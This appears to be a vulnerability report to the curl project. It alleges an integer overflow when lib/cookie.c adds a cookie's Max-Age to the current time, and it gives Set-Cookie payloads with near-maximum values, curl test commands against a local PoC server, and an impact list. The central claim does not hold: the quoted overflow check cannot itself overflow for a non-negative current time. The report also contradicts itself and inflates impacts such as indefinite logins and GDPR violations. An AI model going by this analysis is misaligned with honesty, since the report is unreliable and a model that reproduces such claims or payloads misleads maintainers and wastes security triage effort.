Cookie Max-Age Integer Overflow Vulnerability

## Summary: The cookie parsing code in `lib/cookie.c` contains an integer overflow vulnerability when processing the `Max-Age` attribute of HTTP cookies. The vulnerable code attempts to add the max-age value to the current timestamp without adequate overflow protection While the code includes an overflow check (`CURL_OFF_T_MAX - now < co->expires`), this check itself can experience integer overflow in edge cases where: 1. The `max-age` value is extremely large (near `CURL_OFF_T_MAX`) 2. The current time (`now`) is large enough that the subtraction `CURL_OFF_T_MAX - now` produces unexpected results 3. The addition `co->expires += now` occurs without proper bounds checking An attacker can exploit this vulnerability by: 1. Controlling a web server or performing a man-in-the-middle attack 2. Sending HTTP responses with `Set-Cookie` headers containing extremely large `Max-Age` values 3. Causing curl/libcurl to incorrectly calculate cookie expiration times 4. Resulting in cookies persisting beyond their intended lifetime or being immediately expired **Vulnerable Code Location:** `lib/cookie.c:607-611` ```c else if(CURL_OFF_T_MAX - now < co->expires) /* would overflow */ co->expires = CURL_OFF_T_MAX; else co->expires += now; ``` ## Affected version **Affected Versions:** curl 7.x - 8.x ## Steps To Reproduce: ### Vulnerable Code Flow 1. **Cookie Header Parsing** (`parse_cookie_header()`) - Parses `Max-Age` attribute from `Set-Cookie` header - Calls `curlx_str_number()` to convert string to integer - Handles overflow cases but with insufficient protection 2. **Overflow Check** (Line 607) ```c if(CURL_OFF_T_MAX - now < co->expires) ``` - This check can itself overflow when `now` is large - Does not account for all edge cases 3. **Time Addition** (Line 611) ```c co->expires += now; ``` - Performs addition without verifying result - Can wrap around on overflow ### Exploitation Scenarios #### Scenario 1: Maximum Max-Age Value ```http HTTP/1.1 200 OK Set-Cookie: session=abc123; Max-Age=9223372036854775807; Path=/ ``` - Max-Age set to `CURL_OFF_T_MAX` (64-bit maximum) - When added to current time, may overflow - Cookie may expire immediately or persist indefinitely #### Scenario 2: Near-Overflow Value ```http HTTP/1.1 200 OK Set-Cookie: tracking=xyz; Max-Age=9223372036854000000; Path=/ ``` - Max-Age chosen to overflow when added to `time(NULL)` - Bypasses overflow check due to edge case - Results in incorrect expiration calculation #### Scenario 3: Cookie Jar Pollution ```http HTTP/1.1 200 OK Set-Cookie: cookie1=val; Max-Age=9223372036854775807 Set-Cookie: cookie2=val; Max-Age=9223372036854775806 Set-Cookie: cookie3=val; Max-Age=9223372036854775805 ... (repeated many times) ``` - Multiple cookies with overflow values - Fills cookie jar with persistent cookies - Causes denial of service --- ### PoC Server A malicious HTTP server has been developed to demonstrate the vulnerability: **File:** `poc_cookie_overflow.py` ```bash # Run the PoC server python3 poc_cookie_overflow.py # Server starts on http://localhost:8000 # Provides 4 different exploit scenarios ``` ### Testing Steps #### Test 1: Maximum Max-Age Value ```bash # Test with vulnerable curl curl -c cookies.txt http://localhost:8000/exploit1 # Examine cookie file cat cookies.txt # Expected (vulnerable): Cookie with incorrect expiration # Expected (patched): Cookie capped at 400 days ``` #### Test 2: Near-Overflow Value ```bash curl -c cookies.txt http://localhost:8000/exploit2 cat cookies.txt # Check if overflow occurred python3 -c " import time with open('cookies.txt') as f: for line in f: if 'near_overflow' in line: parts = line.split() expiry = int(parts[4]) now = int(time.time()) print(f'Expiry: {expiry}') print(f'Now: {now}') print(f'Diff: {expiry - now} seconds') print(f'Days: {(expiry - now) / 86400} days') " ``` #### Test 3: Negative Max-Age ```bash curl -c cookies.txt http://localhost:8000/exploit3 cat cookies.txt # Verify cookie was expired immediately ``` #### Test 4: Cookie Jar Pollution ```bash curl -c cookies.txt http://localhost:8000/exploit4 wc -l cookies.txt # Should show 10+ cookies with overflow values ``` ## Supporting Material/References: - [RFC 6265 - HTTP State Management Mechanism](https://datatracker.ietf.org/doc/html/rfc6265) - [RFC 6265bis - Cookies (Draft)](https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis) - [CWE-190: Integer Overflow or Wraparound](https://cwe.mitre.org/data/definitions/190.html) - [curl Security Policy](https://curl.se/docs/security.html) * [attachment / reference] Attached PoC, patch files ## Impact ## Summary: - Attacker-set session cookies persist beyond intended lifetime - Users remain logged in indefinitely - Session tokens cannot be properly expired - Tracking cookies persist longer than allowed - User privacy preferences bypassed - GDPR/privacy regulation violations - Authentication cookies may expire immediately - Or persist indefinitely, preventing logout - Access control mechanisms compromised - Malformed cookies fill up cookie storage - Legitimate cookies may be evicted - Application functionality degraded